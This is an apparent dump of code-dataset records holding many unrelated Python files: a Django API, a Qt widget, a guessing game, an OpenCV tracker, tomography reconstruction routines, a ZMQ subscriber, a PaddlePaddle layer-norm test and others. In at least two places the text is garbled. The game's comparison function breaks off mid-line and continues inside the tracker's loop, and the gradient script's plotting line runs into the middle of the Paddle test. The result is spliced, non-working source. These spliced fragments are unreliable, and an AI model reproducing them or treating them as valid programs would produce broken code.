tasks.filter(user=task_user)\n\t\t\t\t\n\n\treturn JsonResponse([{\n\t\t'task_id': t.task_id,\n\t\t'title': t.title,\n\t\t'start_time': t.start_time.strftime('%d.%m.%Y'),\n\t\t'stop_time': t.stop_time.strftime('%d.%m.%Y'),\n\t\t'description': t.description,\n\t\t'status': t.status,\n\t\t'user_id': t.user.username,\n\t\t'user_name': ('%s %s') % (t.user.first_name, t.user.last_name)\n\t\t} for t in tasks[start:start+count]], safe=False)\n","sub_path":"www/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"552328138","text":"from PySide2 import QtGui, QtCore, QtWidgets\nfrom PySide2.QtCore import Slot, Signal\n\nclass HTMLDictionaryExtractorWidget(QtWidgets.QWidget):\n def __init__(self, parent, extractor):\n super().__init__(parent=parent)\n self.extractor = extractor\n\n layout = QtWidgets.QVBoxLayout()\n\n layout.addWidget(self.create_word_lists())\n layout.addWidget(self.create_html_field())\n layout.addWidget(self.create_control_group())\n\n self.setLayout(layout)\n\n def create_html_field(self):\n group = QtWidgets.QGroupBox()\n group.setTitle(\"HTML\")\n\n layout = QtWidgets.QVBoxLayout()\n\n self.html_field = QtWidgets.QTextEdit()\n self.html_field.setAlignment(QtCore.Qt.AlignLeft)\n self.html_field.textChanged.connect(self.text_changed)\n\n layout.addWidget(self.html_field)\n group.setLayout(layout)\n\n return group\n\n def text_changed(self):\n self.extractor.text = self.html_field.toPlainText()\n\n def create_control_group(self):\n group = QtWidgets.QWidget()\n layout = QtWidgets.QHBoxLayout()\n\n save_button = QtWidgets.QPushButton()\n save_button.setText(\"Save\")\n save_button.clicked.connect(self.extractor.save_dictionary)\n\n load_button = QtWidgets.QPushButton()\n load_button.setText(\"Load\")\n load_button.clicked.connect(self.extractor.load_dictionary)\n\n extract_button = QtWidgets.QPushButton()\n extract_button.setText(\"Extract\")\n extract_button.clicked.connect(self.extractor.get_dictionary_diff)\n\n apply_button = QtWidgets.QPushButton()\n apply_button.setText(\"Apply\")\n 
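# --- Editor's hedged sketch (not part of the original file): create_word_list()
# further down connects a `list_size_changed` Signal(int) from each word-list
# model, so the extractor's models are assumed to expose that signal. A minimal
# PySide2 model satisfying that contract could look like the following; the
# class and method names are illustrative assumptions, not the project's API.
#
# from PySide2.QtCore import QAbstractListModel, QModelIndex, Qt, Signal
#
# class WordListModel(QAbstractListModel):
#     list_size_changed = Signal(int)  # emitted whenever the word count changes
#
#     def __init__(self, words=None):
#         super().__init__()
#         self._words = list(words or [])
#
#     def rowCount(self, parent=QModelIndex()):
#         return len(self._words)
#
#     def data(self, index, role=Qt.DisplayRole):
#         if index.isValid() and role == Qt.DisplayRole:
#             return self._words[index.row()]
#         return None
#
#     def add_word(self, word):
#         # insert at the end, notify attached views, then fire the size signal
#         self.beginInsertRows(QModelIndex(), len(self._words), len(self._words))
#         self._words.append(word)
#         self.endInsertRows()
#         self.list_size_changed.emit(len(self._words))
# --- end sketch ---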
apply_button.clicked.connect(self.extractor.apply_dictionary_diff)\n\n layout.addWidget(save_button)\n layout.addWidget(load_button)\n layout.addWidget(extract_button)\n layout.addWidget(apply_button)\n\n group.setLayout(layout)\n return group\n \n def create_word_lists(self):\n group = QtWidgets.QWidget()\n layout = QtWidgets.QHBoxLayout()\n\n layout.addWidget(self.create_word_list(\"Add list\", self.extractor.add_word_list))\n layout.addWidget(self.create_word_list(\"Removed list\", self.extractor.removed_word_list))\n\n group.setLayout(layout)\n return group\n\n def create_word_list(self, title, model):\n group = QtWidgets.QGroupBox()\n group.setTitle(title)\n layout = QtWidgets.QHBoxLayout()\n\n @Slot(int)\n def title_callback(list_size):\n group.setTitle(f\"{title} ({list_size})\")\n\n list_view = QtWidgets.QListView()\n list_view.setModel(model)\n\n model.list_size_changed.connect(title_callback)\n\n layout.addWidget(list_view)\n group.setLayout(layout)\n\n return group\n\n\n\n","sub_path":"src/app/HTMLDictionaryExtractorWidget.py","file_name":"HTMLDictionaryExtractorWidget.py","file_ext":"py","file_size_in_byte":2801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"262234788","text":"import random\nfrom art import logo,vs\nfrom dictionary import data\n\n\n# first choice\n\ndef formating(data1):\n account_name1 = data1[\"name\"]\n acount_description1 = data1[\"description\"]\n account_country1 = data1[\"country\"]\n return (f\" {account_name1}, a {acount_description1}, from {account_country1}\")\n\ndef game_print():\n print (f\"Compare A: {formating(compare_a)}\")\n print(\"vs\")\n print (f\"Against B: {formating(compare_b)}\")\n\n\n#random data from dictionary + removing from data set\ndef chose_the_next_one(data):\n compare_next = random.choice(data)\n data.remove(compare_next)\n return compare_next\n \ndef check(user_choise, a_followers, b_followers):\n \n if user_choise==\"a\" and a_followers> b_followers :\n return True\n elif user_choise==\"b\" and a_followers<b_followers:
 if len(contours) > 0:\n contourOI_.append(max(contours, key=cv2.contourArea))\n area = cv2.contourArea(contourOI_[roi])\n if (area > area_min) and (area < area_max):\n contourOI.append(cv2.convexHull(contourOI_[roi]))\n M = cv2.moments(contourOI[roi])\n cx.append(int(M[\"m10\"] / M[\"m00\"]))\n cy.append(int(M[\"m01\"] / M[\"m00\"]))\n data[roi].append((frame_id, cx[roi], cy[roi], area))\n else:\n print(\"no large enough contour found for roi {}!\".format(roi))\n data[roi].append((frame_id, np.nan, np.nan, np.nan))\n contourOI_[-1] = False\n contourOI.append(False)\n cx.append(np.nan)\n cy.append(np.nan)\n else:\n print(\"no contour found for roi {}!\".format(roi))\n data[roi].append((frame_id, np.nan, np.nan, np.nan))\n contourOI_.append(False)\n contourOI.append(False)\n cx.append(np.nan)\n cy.append(np.nan)\n\n if frame_id % 500 == 0:\n print(\"Frame {}\".format(frame_id))\n if display:\n full_image_thresholded = (cv2.threshold(frameDelta_full, threshold, 255, cv2.THRESH_TOZERO)[1])\n # Live display of full resolution and ROIs\n cv2.putText(full_image_thresholded, \"Framenum: {}\".format(frame_id), (30,\n full_image_thresholded.shape[0] -\n 30), cv2.FONT_HERSHEY_SIMPLEX,\n fontScale=0.5, color=255)\n\n for roi in range(0, len(rois) - 1):\n if np.all(contourOI_[roi] != False):\n curr_roi = rois[\"roi_\" + str(roi)]\n # add in contours\n corrected_contour = np.empty(contourOI_[roi].shape)\n corrected_contour[:, 0, 0] = contourOI_[roi][:, 0, 0] + curr_roi[0]\n corrected_contour[:, 0, 
1] = contourOI_[roi][:, 0, 1] + curr_roi[1]\n cv2.drawContours(full_image_thresholded, corrected_contour.astype(int), -1, 255, 1)\n\n # add in centroid\n cv2.circle(full_image_thresholded, (cx[roi] + curr_roi[0], cy[roi] + curr_roi[1]), 8, 255, 1)\n\n cv2.imshow(\"Live thresholded\", full_image_thresholded)\n cv2.imshow(\"Live\", gray)\n cv2.waitKey(1)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n frame_id += 1\n\n # saving data\n print(\"Saving data output\")\n date = datetime.datetime.now().strftime(\"%Y%m%d\")\n\n for roi in range(0, len(rois) - 1):\n datanp = np.array(data[roi])\n if split_name is False:\n filename = video_path[0:-4] + \"_tracks_{}_Thresh_{}_Area_{}_roi-{}.csv\".format(date, threshold, area_min,\n roi)\n else:\n range_s = str(split_range[0]).zfill(5)\n range_e = str(split_range[1]).zfill(5)\n filename = video_path[0:-4] + \"_tracks_{}_Thresh_{}_Area_{}_Range{}-{}_.csv\".format(date, threshold,\n area_min, range_s,\n range_e)\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n np.savetxt(filename, datanp, delimiter=\",\")\n\n print(\"Tracking finished on video cleaning up\")\n cv2.destroyAllWindows()\n","sub_path":"ola_behave/tracking/offline_tracker.py","file_name":"offline_tracker.py","file_ext":"py","file_size_in_byte":6371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"247264876","text":"# Read File\nimport numpy as np\nimport pandas as pd\n\n\ndef read(file_name):\n data_aux = pd.read_csv(file_name)\n sin = data_aux['sin']\n dm = data_aux['dm']\n chi = data_aux['chi']\n\n return dm.array, sin.array, chi.array\n\ny, x, z = read('data.csv')\n#y, x, z = np.genfromtxt(r'data.dat', unpack=True)\nx_bugey, y_bugey = np.loadtxt(\"bugey_90.dat\", unpack=True)\n\n#Plot Contour\nimport matplotlib.pyplot as plt\nimport scipy.interpolate\n\nfig = plt.figure()\n\nprint(z)\nplt.plot(x_bugey,y_bugey,color='black',label='Bugey')\nsys = plt.tricontour(x,y,z,levels=[min(z)+4.61], colors='red')\n\n\nsys.collections[0].set_label('New Effect')\n\nplt.legend()\n\ny_axis_NAME='$\\\\Delta m^2[eV]^2$'\nx_axis_NAME='$\\\\sin^22\\\\theta$'\n\nplt.xscale('log')\nplt.yscale('log')\nplt.xlim([0.01,1.0])\nplt.ylim([0.003,20.0])\nplt.ylabel(y_axis_NAME)\nplt.xlabel(x_axis_NAME)\n\nplt.title('Bugey - No Systematics Marginalization')\nplt.savefig('th14_dm41.pdf') \nplt.show()\n","sub_path":"plot/contour_plot.py","file_name":"contour_plot.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"577068606","text":"import h5py\nfrom PIL import Image\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom skimage.transform import iradon\nimport radontea\nfrom scipy.interpolate import interp1d\nimport math\nfrom tqdm import tqdm\nimport tensorflow as tf\n\n\n\ndef get_from_mat(filename):\n ''' loads sino '''\n file = h5py.File(filename, 'r')\n key, = list(file.keys())\n return file.get(key)[:]\n\n\ndef correct_image(img, shifts, linear_interpolation=True, **args):\n ''' \n Correct shifted image using linear interpolation, example:\n :param img: raw image\n :param shifts: np.array of desired shifts\n :param linear_interpolation: use linear interpolation or simple round\n **args for scipy.interpolate.interp1d, refer scipy.interpolate\n \n Example:\n sino_corrected_linear = correct_image(sino_raw, 1.5 * shifts.squeeze(), linear_interpolation=True, kind='cubic')\n \n :return: np.array corrected image\n '''\n shifts = shifts.squeeze()\n\n assert 
img.ndim == 2\n assert img.shape[0] == shifts.shape[0]\n\n margin_right = -int(np.floor(shifts.min()))\n margin_left = int(np.ceil (shifts.max()))\n assert margin_left > 0 and margin_right > 0\n\n result = np.zeros(shape=(img.shape[0], img.shape[1] + margin_left + margin_right), dtype=img.dtype)\n\n for i_row, (row, shift) in enumerate(zip(img, shifts)):\n if linear_interpolation:\n x = np.arange(len(row))\n f = interp1d(x - shift, row, **args)\n row_interpolated = f(np.clip(np.arange(-margin_left, img.shape[1] + margin_right), (x - shift).min(), (x - shift).max()))\n result[i_row] = row_interpolated\n else:\n shift = -int(np.round(shift))\n result[i_row][margin_left + shift : margin_left + shift + len(row)] = row\n\n return result[:,margin_left + margin_right : -(margin_left + margin_right)]\n\n\n\ndef np_iradon_custom(sino, angles, filtering=True, circle=True):\n ln = sino.shape[1]\n # filetring:\n if filtering:\n kx = 2 * np.pi * np.abs(np.fft.fftfreq(ln))\n kx = kx[None, :]\n projection = np.fft.fft(sino, axis=0) * kx\n sino_filtered = np.real(np.fft.ifft(projection, axis=0))\n # Resize filtered sinogram back to original size\n sino = sino_filtered[:, :ln]\n \n # main process:\n fourier_sino = np.fft.rfft(sino, axis=0)\n wfilt = np.linspace(0, fourier_sino.shape[0], fourier_sino.shape[0])[:,np.newaxis]\n #wfilt *= (np.cos(wfilt * np.pi / 2))**2\n backprojections = np.fft.irfft(fourier_sino * wfilt, axis=0)\n result = np.zeros(dtype=float, shape=backprojections.shape[:1] * 2)\n size = result.shape[0]\n xx, yy = np.meshgrid(*[np.linspace(-(size - 1) / 2., (size - 1) / 2., size)] * 2)\n for th, backproj in zip(angles, backprojections.T):\n th *= np.pi / 180.\n coords = xx * np.cos(th) + yy * np.sin(th) + (size - 1) / 2\n ccoords = np.ceil(coords).astype(int)\n fcoords = np.floor(coords).astype(int)\n# # print(th, coords, ccoords, fcoords)\n cmask = (ccoords >= 0) & (ccoords < size)\n fmask = (fcoords >= 0) & (fcoords < size)\n wc = 1 - (ccoords - coords)\n wf = 1 - (coords - fcoords)\n# print(wc, wf)\n result += backproj[np.where(cmask, ccoords, 0)] * wc + \\\n backproj[np.where(fmask, fcoords, 0)] * wf\n if circle:\n out_reconstruction_circle = (xx ** 2 + yy ** 2) >= ((size - 1) / 2) ** 2\n result[out_reconstruction_circle] = 0.\n return result / len(angles) / (2. 
* np.pi)\n\n\n\ndef tf_iradon_custom(sino, angles, filtering=True, circle=True):\n sino = tf.convert_to_tensor(sino, dtype=tf.float64)\n angles = tf.convert_to_tensor(angles * np.pi / 180., dtype=tf.float64)\n \n if filtering:\n ln = sino.shape[1]\n kx = 2 * np.pi * np.abs(np.fft.fftfreq(ln))\n kx = kx[None, :]\n kx = tf.convert_to_tensor(kx, dtype=tf.float64)\n sino_prepared = tf.transpose(tf.cast(sino, tf.complex128))\n projection = tf.transpose(tf.signal.fft(sino_prepared)) * tf.cast(kx, tf.complex128)\n sino_filtered = tf.transpose(tf.math.real(tf.signal.ifft(tf.transpose(projection))))\n # Resize filtered sinogram back to original size\n sino = sino_filtered[:, :ln]\n \n # main process:\n fourier_sino = tf.transpose(tf.signal.rfft(tf.transpose(sino))) # maybe 2d?\n shape = tf.shape(fourier_sino)[0]\n wfilt = tf.linspace(0., tf.cast(shape, dtype=tf.float64), shape)[:, None]\n wfilt = tf.cast(wfilt, tf.complex128)\n backprojections = tf.transpose(tf.signal.irfft(tf.transpose(fourier_sino * wfilt)))\n size = tf.shape(backprojections)[0]\n result = tf.zeros(dtype=tf.float64, shape=[size] * 2)\n xx, yy = tf.meshgrid(*[tf.linspace(-(size - 1) / 2, (size - 1) / 2, size)] * 2)\n backprojections = tf.transpose(backprojections)\n for th, backproj in zip(angles, backprojections):\n coords = tf.cast(xx, tf.float64) * tf.cos(th) + tf.cast(yy, tf.float64) * tf.sin(th) + (tf.cast(size, tf.float64) - 1.) / 2.\n ccoords = tf.cast(tf.math.ceil(coords), tf.int32)\n fcoords = tf.cast(tf.math.floor(coords), tf.int32)\n cmask = tf.math.logical_and(ccoords >= 0, ccoords < size)\n fmask = tf.math.logical_and(fcoords >= 0, fcoords < size)\n wc = 1. - (tf.cast(ccoords, tf.float64) - coords)\n wf = 1. - (coords - tf.cast(fcoords, tf.float64))\n result += tf.gather(backproj, tf.where(cmask, ccoords, 0)) * wc + \\\n tf.gather(backproj, tf.where(fmask, fcoords, 0)) * wf\n result = result.numpy() / angles.shape[0] / (2. 
* np.pi)\n if circle:\n out_reconstruction_circle = (xx.numpy() ** 2 + yy.numpy() ** 2) >= ((size.numpy() - 1) / 2) ** 2\n result[out_reconstruction_circle] = 0.\n return result\n\n\n\ndef iradon_centered(image, angles, center, kind='linear', lib='scipy', show=False):\n '''\n Apply inverse radon transform to image.\n :param image: corrected image\n :param angles: array of sinogram angles\n :param center: desired center of sinogram\n :param kind: kind of interpolation for scipy.interpolate.interp1d used in centering\n :param lib: scipy or radontea - desired lib for reconstruction\n :param show: whether to show shifted sinogram and final result\n \n :return: reconstruction\n '''\n shift = image.shape[1] / 2 - center\n fixed_image = np.zeros((image.shape[0], 2 * math.ceil(np.abs(shift)) + image.shape[1]))\n for i_row, row in enumerate(image):\n x = np.arange(len(row))\n if shift < 0:\n f = interp1d(x - shift, row, kind=kind)\n row_interpolated = f(np.clip(np.arange(-shift, image.shape[1]), (x - shift).min(), (x - shift).max()))\n fixed_image[i_row, :len(row_interpolated)] = row_interpolated\n else:\n f = interp1d(x + shift, row, kind=kind)\n row_interpolated = f(np.clip(np.arange(0, image.shape[1] + shift), (x + shift).min(), (x + shift).max()))\n fixed_image[i_row, -len(row_interpolated):] = row_interpolated\n if show:\n plt.figure(figsize=(10, 12))\n plt.imshow(fixed_image)\n plt.title('prepared sino with shift: ' + str(shift))\n plt.show()\n if lib == 'radontea':\n reco = radontea.backproject(fixed_image, angles)\n elif lib == 'scipy':\n reco = iradon(fixed_image.T, angles * 180 / np.pi)\n elif lib == 'custom_np':\n reco = np_iradon_custom(fixed_image.T, angles * 180 / np.pi)\n elif lib == 'custom_tf':\n reco = tf_iradon_custom(fixed_image.T, angles * 180 / np.pi)\n else:\n raise NotImplementedError('This lib is unknown')\n if show:\n plt.figure(figsize=(15, 15))\n plt.imshow(reco, vmax=0.001)\n plt.show()\n return reco\n\n\ndef find_visual_best(centers, sino, angles, from_x=0, from_y=0, to_x=None, to_y=None, ncols=2, **kwargs):\n '''\n Plotting part of reconstructions with specified center for visual check of quality.\n \n :param centers: iterable of desired centers\n :param sino: sino prepared for iradon_centered\n :param angles: angles for iradon_centered\n :param from_x: desired crop start for axis 0, zero by default\n :param from_y: desired crop start for axis 1, zero by default\n :param to_x: desired crop end for axis 0, None by default, which means reco.shape[0]\n :param to_y: desired crop end for axis 1, None by default, which means reco.shape[1]\n :param ncols: number of columns to be plotted\n\n :return: plt.figure\n '''\n \n nrows = math.ceil(len(centers) / ncols)\n f, axs = plt.subplots(nrows, ncols, figsize=(15, 25))\n for i, center in enumerate(tqdm(centers)):\n kwargs['show'] = kwargs.get('show', False)\n reco = iradon_centered(sino, angles, center=sino.shape[1] / 2 + center, **kwargs)\n row = i // ncols\n col = i % ncols\n if to_x is None:\n to_x = reco.shape[0]\n if to_y is None:\n to_y = reco.shape[1]\n axs[row][col].imshow(reco[from_x:to_x,from_y:to_y])\n axs[row][col].set_title('center: ' + str(center))\n return f","sub_path":"reconstruct.py","file_name":"reconstruct.py","file_ext":"py","file_size_in_byte":9134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"409671410","text":"#!/usr/bin/env python\n\nimport zmq\nimport json\nimport sys\n\nif sys.version_info < (3, 0):\n print(\"This script requires Python 3.\")\n 
sys.exit(1)\n\ndef subscribe(host):\n return subscribe_with_filter(host, \"\")\n\n\ndef subscribe_with_filter(host, topic_filter):\n subscriber = zmq.Context().socket(zmq.SUB)\n subscriber.setsockopt_string(zmq.SUBSCRIBE, topic_filter)\n subscriber.connect(host)\n return subscriber\n\ndef await_and_consume(subscriber, handlers):\n while True:\n msg = subscriber.recv_string()\n try:\n obj = json.loads(msg)\n # print(obj)\n\n message_type = obj['message_type']\n handler = handlers.get(message_type, None)\n if handler:\n handler(obj['body'])\n else:\n print('No handler for message type: ' + message_type)\n\n except ValueError:\n print('Failed to parse JSON: ' + msg)\n\ndef login_topic_handler(data):\n print(\"Login with data: {}\".format(data))\n\n\nawait_and_consume(subscribe(\"tcp://35.189.246.57:5556\"), {'login': login_topic_handler})\n","sub_path":"clients/python/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"26095287","text":"import numpy as np\n\nMAX_DEGREE = 30\nfile = open('GaussLegendre.dat', 'w')\n\nfor deg in range(2,MAX_DEGREE+1,2):\n x, w = np.polynomial.legendre.leggauss(deg)\n \n # Write nodes\n file.write('static double s_n' + str(deg) + '[] = { ' + format(x[0], '.16f'))\n for k in range(1,deg):\n file.write(', ' + format(x[k], '.16f'))\n file.write(' };\\n')\n \n # Write weights\n file.write('static double s_w' + str(deg) + '[] = { ' + format(w[0], '.16f'))\n for k in range(1,deg):\n file.write(', ' + format(w[k], '.16f'))\n file.write(' };\\n')\n \n","sub_path":"util/CreateGaussLegendre.py","file_name":"CreateGaussLegendre.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"125032848","text":"#!/usr/bin/python\n\"\"\"\nCompute gradient of temperature\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as ppl\nimport h5py\n\nfrom scipy.stats import scoreatpercentile\n\nimport ConfigBF\nreload(ConfigBF)\nfrom ConfigBF import *\n\nfrom cPickle import load as cLoad\nfrom gzip import GzipFile\n\nfrom sys import path\npath.append('/home/cimatori/installed/nioz-hst/Python/Trunk')\nfrom NIOZhst.String import String\n\nimport gsw\n\nppl.close('all')\n\nprint ('Load data...')\n\nf = GzipFile(DetailFile, 'r')\nS = cLoad(f)\nf.close()\n\ntime, Tmp = S.ToArray(Range=(Start,End), Convention='yearday', \\\n Fill='missing', Skip=SubSamp, ColInt=True)\n\nZ = S.Depths\n\nif SubSamp>=0:\n dt = SubSamp+1\nelse:\n dt = -SubSamp\n\nprint ('Data loaded.')\n\n# we open now the output file, in order to copy the attributes\noutput = h5py.File (\\\n OutDir+'results/Gradient_Start_{}_End_{}.hdf'.format(Start,End),\\\n mode='w')\n\ndims = output.create_group('dims')\nrd = output.create_group('data')\n# Depth\nDepth = dims.create_dataset('depth', \\\n shape=Z.shape, maxshape=Z.shape, **hdfopt)\nDepth.attrs['Units'] = 'm'\n# Time\nTime = dims.create_dataset('time', \\\n shape=time.shape, maxshape=(None,), **hdfopt)\nTime.attrs['Units'] = 'yearday'\n# Ids\nId = dims.create_dataset('th_id', \\\n shape=Z.shape, maxshape=Z.shape, **hdfopt)\n# Potential temperature\nTh = rd.create_dataset('potemp', \\\n shape=(Z.size,time.size), maxshape=(Z.size,time.size), \\\n **hdfopt)\nTh.attrs['Units'] = 'deg C'\n# Bouyancy frequency squared\nBFreq2 = rd.create_dataset('N2', \\\n shape=(Z.size,time.size), maxshape=(Z.size,time.size), \\\n **hdfopt)\nBFreq2.attrs['Units'] = 's^-2'\n# 
overwrite time step which is different\noutput.attrs['TimeStep'] = -SubSamp\n\n#Compute gradient\nprint ('Compute gradient')\npres = gsw.p_from_z(Z, lat=36.98)\nTmean = Tmp[~np.isnan(Tmp)].mean()\npMean = pres.mean()\nalr = gsw.adiabatic_lapse_rate_from_t(35.12, Tmean, pMean)\nalpha = gsw.alpha(35.12, Tmean, pMean)\nT = Tmp - alr*(pres-pMean)[:,np.newaxis]\ndz = np.mean(np.diff(Z))\n\n# gradient of unstable profile\ndTdz2,_ = np.gradient(T,dz,-SubSamp)\nNbv2 = g*dTdz2*alpha\n\nprint('Save data')\n\nTime[:] = time\nDepth[:] = Z\nTh[:] = T\nBFreq2[:] = Nbv2\noutput.close()\n\n#Plot data\nif 1:\n print ('Plot potential temperature')\n F = ppl.figure()\n F.subplots_adjust(left=0.09, bottom=0.08, right=1.02, top=0.98)\n AX = F.add_subplot(111)\n data = T[:,(time>=DetStart)&(time<DetEnd)]
 max_relative_error)\n return (\"%s Variable %s max gradient diff %f over limit %f, \"\n \"the first error element is %d, %f, %f\") % (\n \"Gradient Check On %s\" % str(place), name, max_diff,\n max_relative_error, offset, a.flatten()[offset],\n b.flatten()[offset])\n\n self.assertLessEqual(max_diff, max_relative_error, err_msg())\n\n def check_forward_backward(self, shape, begin_norm_axis):\n def test_with_place(place, shape, begin_norm_axis=1):\n # setUp\n assert begin_norm_axis > 0 and begin_norm_axis < len(\n shape), 'begin_norm_axis must be between 0 and len(shape)-1.'\n # attr\n epsilon = 0.00001\n x_shape = shape\n D = reduce(mul, x_shape[begin_norm_axis:len(x_shape)], 1)\n scale_shape = [D]\n np.random.seed(123)\n x_val = np.random.random_sample(x_shape).astype(np.float32)\n scale_val = np.random.random_sample(scale_shape).astype(np.float32)\n bias_val = np.random.random_sample(scale_shape).astype(np.float32)\n y_grad = np.random.random_sample(x_shape).astype(np.float32)\n\n # run forward\n y_out, saved_mean, var_ref = _reference_layer_norm_naive(\n x_val, scale_val, bias_val, epsilon, begin_norm_axis)\n naive_fw = {\"Y\": y_out, \"Mean\": saved_mean, \"Variance\": var_ref}\n\n # get gradient\n x_grad_ref, scale_grad_ref, bias_grad_ref = _reference_layer_norm_grad(\n x_val, y_grad, scale_val, saved_mean, var_ref, begin_norm_axis)\n naive_grad = {\n \"X\": x_grad_ref,\n \"Scale\": scale_grad_ref,\n \"Bias\": bias_grad_ref\n }\n\n scope = core.Scope()\n\n # create input\n input_map = {\"X\": x_val, \"Scale\": scale_val, \"Bias\": bias_val}\n for i_name in input_map:\n create_or_get_tensor(scope, i_name, input_map[i_name], place)\n\n # create output\n output_map = {\"Y\": None, \"Mean\": None, \"Variance\": None}\n output_tensor = {}\n for o_name in output_map:\n output_tensor[o_name] = create_or_get_tensor(\n scope, o_name, output_map[o_name], place)\n\n layer_norm_op = Operator(\n \"layer_norm\",\n # inputs\n X=\"X\",\n Scale=\"Scale\",\n Bias=\"Bias\",\n # outputs\n Y=\"Y\",\n Mean=\"Mean\",\n Variance=\"Variance\",\n # attrs\n epsilon=epsilon,\n begin_norm_axis=begin_norm_axis)\n\n layer_norm_op.run(scope, place)\n\n # check forward result\n atol = 5e-2 if isinstance(place, core.CUDAPlace) else 1e-4\n for o_tensor in output_tensor:\n self.__assert_close(output_tensor[o_tensor], naive_fw[o_tensor],\n o_tensor, atol)\n\n # run backward\n layer_norm_op_grad = get_backward_op(scope, layer_norm_op, set())\n set_output_grad(\n scope, [\"Y\", \"Mean\", \"Variance\"],\n place,\n feed_dict={\"Y\": y_grad})\n layer_norm_op_grad.run(scope, place)\n\n # get output\n grad_tensor = {}\n for o_name in naive_grad:\n grad_tensor[o_name] = x_ = create_or_get_tensor(\n scope, 
grad_var_name(o_name), None, place)\n\n # check gradient output\n for o_grad in naive_grad:\n self.__assert_grad_close(grad_tensor[o_grad],\n naive_grad[o_grad], o_grad + \"@GRAD\",\n place)\n\n places = [core.CPUPlace()]\n if core.is_compiled_with_cuda() and core.op_support_gpu(\"layer_norm\"):\n places.append(core.CUDAPlace(0))\n\n for place in places:\n test_with_place(place, shape, begin_norm_axis)\n\n def test_check_forward_backward_with_scale_and_bias(self):\n self.check_forward_backward(shape=[2, 3, 4, 5], begin_norm_axis=1)\n self.check_forward_backward(shape=[2, 3, 4, 5], begin_norm_axis=3)\n\n def test_check_forward_backward_with_scale(self):\n pass # TODO(zcd)\n\n def test_check_forward_backward_with_bias(self):\n pass # TODO(zcd)\n\n def test_check_forward_backward(self):\n pass # TODO(zcd)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"python/paddle/v2/fluid/tests/test_layer_norm_op.py","file_name":"test_layer_norm_op.py","file_ext":"py","file_size_in_byte":9230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"234447833","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\ndef migrate_irc_nick(apps, schema_editor):\n \"\"\"Copy the User.username into the StandupUser.irc_nick field because this is what the irc bot in\n Standup v1 used to match.\n\n \"\"\"\n StandupUser = apps.get_model('status', 'StandupUser')\n for suser in StandupUser.objects.all():\n suser.irc_nick = suser.user.username\n suser.save()\n\n\ndef wipe_irc_nick(apps, schema_editor):\n \"\"\"Wipe the StandupUser.irc_nick field contents\"\"\"\n StandupUser = apps.get_model('status', 'StandupUser')\n for suser in StandupUser.objects.all():\n suser.irc_nick = None\n suser.save()\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('status', '0006_add_irc_nick'),\n ]\n\n operations = [\n migrations.RunPython(migrate_irc_nick, wipe_irc_nick),\n ]\n","sub_path":"standup/status/migrations/0007_migration_irc_nick.py","file_name":"0007_migration_irc_nick.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"74961650","text":"from value import LeagueValues as Lv\n\n\nclass LoLItem:\n def __init__(self, name, item_id, gist, description, base, buy, sell, builds_from_list, builds_into_list, art):\n self.name = name\n self.item_id = item_id\n self.gist = gist\n self.description = description\n self.base = base\n self.buy = buy\n self.sell = sell\n self.builds_from_list = builds_from_list\n self.builds_into_list = builds_into_list\n self.art = art\n\n def to_str(self, depth=0):\n tabs = '\\t' * depth\n string = '{}{}\\n'.format(tabs, self.name)\n string += '{}{}\\n\\n'.format(tabs, self.gist)\n string += '{}{}\\n\\n'.format(tabs, self.description)\n string += '{}Gold:\\n'.format(tabs)\n string += '{}\\tBase: {}\\n'.format(tabs, self.base)\n string += '{}\\tTotal: {}\\n'.format(tabs, self.buy)\n string += '{}\\tSell: {}\\n'.format(tabs, self.sell)\n if self.builds_from_list:\n string += '{}Builds from:\\n'.format(tabs)\n for b in self.builds_from_list:\n string += '\\t{}{}\\n'.format(tabs, b)\n if self.builds_into_list:\n string += '{}Builds into:\\n'.format(tabs)\n for b in self.builds_into_list:\n string += '\\t{}{}\\n'.format(tabs, b)\n return 
[string]\n","sub_path":"structure/LoLItem.py","file_name":"LoLItem.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"623162961","text":"class HTTP_RES:\n CODE_SUCCESSFULY = 200\n CODE_BAD_REQUEST = 400\n CODE_UNAUTHORIZED = 401\n CODE_FORBIDDEN = 403\n CODE_INTERNAL_SERVER = 500\n\n # msg\n MSG_SUCCESSFULY = 'Successfully'\n\n SUCCESSFULY = {\n 'status': 200,\n 'msg': 'Successfully',\n 'data': ''\n }\n\n BAD_REQUEST = {\n 'status': 400,\n 'msg': 'Bad request'\n }\n\n UNAUTHORIZED = {\n 'status': 401,\n 'msg': 'Required headers for request'\n }\n\n FORBIDDEN = {\n 'status': 403,\n 'msg': 'Request does not have the permissions to access'\n }\n\n INTERNAL_SERVER = {\n 'status': 500,\n 'msg': 'Internal server error'\n }\n","sub_path":"microservice-advance/newsservice/src/conf/http_res.py","file_name":"http_res.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
